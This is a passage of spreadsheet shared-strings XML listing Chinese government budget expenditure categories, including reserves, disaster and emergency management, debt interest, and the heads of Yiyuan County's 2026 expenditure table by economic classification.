    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>重要商品储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>棉花储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>食糖储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>肉类储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>化肥储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>农药储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>边销茶储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>羊毛储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>医药储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>食盐储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>战略物资储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>应急物资储备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他重要商品储备支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>灾害防治及应急管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>应急管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>灾害风险防治</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国务院安委会专项</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>安全监管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>应急救援</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>应急管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他应急管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>消防救援事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>消防应急救援</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他消防救援事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>矿山安全</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>矿山安全监察事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>矿山应急救援事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他矿山安全支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地震事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地震监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地震预测预报</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地震灾害预防</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地震应急救援</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地震环境探察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>防震减灾信息管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>防震减灾基础管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地震事业机构</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他地震事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然灾害防治</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地质灾害防治</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>森林草原防灾减灾</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他自然灾害防治支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然灾害救灾及恢复重建支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然灾害救灾补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>自然灾害灾后重建补助</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他自然灾害救灾及恢复重建支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他灾害防治及应急管理支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他灾害防治及应急管理支出</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 预备费</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>债务付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中央政府国内债务付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中央政府国外债务付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中央政府境外发行主权债券付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中央政府向外国政府借款付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中央政府向国际金融组织借款付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中央政府其他国外借款付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府一般债务付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府一般债券付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府向外国政府借款付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府向国际组织借款付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>地方政府其他一般债务付息支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>合</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>计</t>
    </r>
  </si>
  <si>
    <t>表38</t>
  </si>
  <si>
    <t>2026年沂源县县级一般公共预算
支出草案表（经济分类）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>单位</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>万元</t>
    </r>
  </si>
  <si>
    <t>基本支出金额</t>
  </si>
  <si>
    <t>501</t>
  </si>
  <si>
    <t>一、机关工资福利支出</t>
  </si>
  <si>
    <t>50101</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>工资奖金津补贴</t>
    </r>
  </si>
  <si>
    <t>50102</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会保障缴费</t>
    </r>
  </si>
  <si>
    <t>50103</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>住房公积金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <t>50199</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他工资福利支出</t>
    </r>
  </si>
  <si>
    <t>502</t>
  </si>
  <si>
    <t>二、机关商品和服务支出</t>
  </si>
  <si>
    <t>50201</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>办公经费</t>
    </r>
  </si>
  <si>
    <t>50202</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>会议费</t>
    </r>
  </si>
  <si>
    <t>50203</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>培训费</t>
    </r>
  </si>
  <si>
    <t>50204</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专用材料购置费</t>
    </r>
  </si>
  <si>
    <t>50205</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>委托业务费</t>
    </r>
  </si>
  <si>
    <t>50206</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公务接待费</t>
    </r>
  </si>
  <si>
    <t>50207</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>因公出国（境）费用</t>
    </r>
  </si>
  <si>
    <t>50208</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公务用车运行维护费</t>
    </r>
  </si>
  <si>
    <t>50209</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>维修（护）费</t>
    </r>
  </si>
  <si>
    <t>50299</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他商品和服务支出</t>
    </r>
  </si>
  <si>
    <t>503</t>
  </si>
  <si>
    <t>三、机关资本性支出（一）</t>
  </si>
  <si>
    <t>50301</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>房屋建筑物购建</t>
    </r>
  </si>
  <si>
    <t>50302</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基础设施建设</t>
    </r>
  </si>
  <si>
    <t>50303</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公务用车购置</t>
    </r>
  </si>
  <si>
    <t>50306</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>设备购置</t>
    </r>
  </si>
  <si>
    <t>50307</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>大型修缮</t>
    </r>
  </si>
  <si>
    <t>50399</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他资本性支出</t>
    </r>
  </si>
  <si>
    <t>504</t>
  </si>
  <si>
    <t>四、机关资本性支出（二）</t>
  </si>
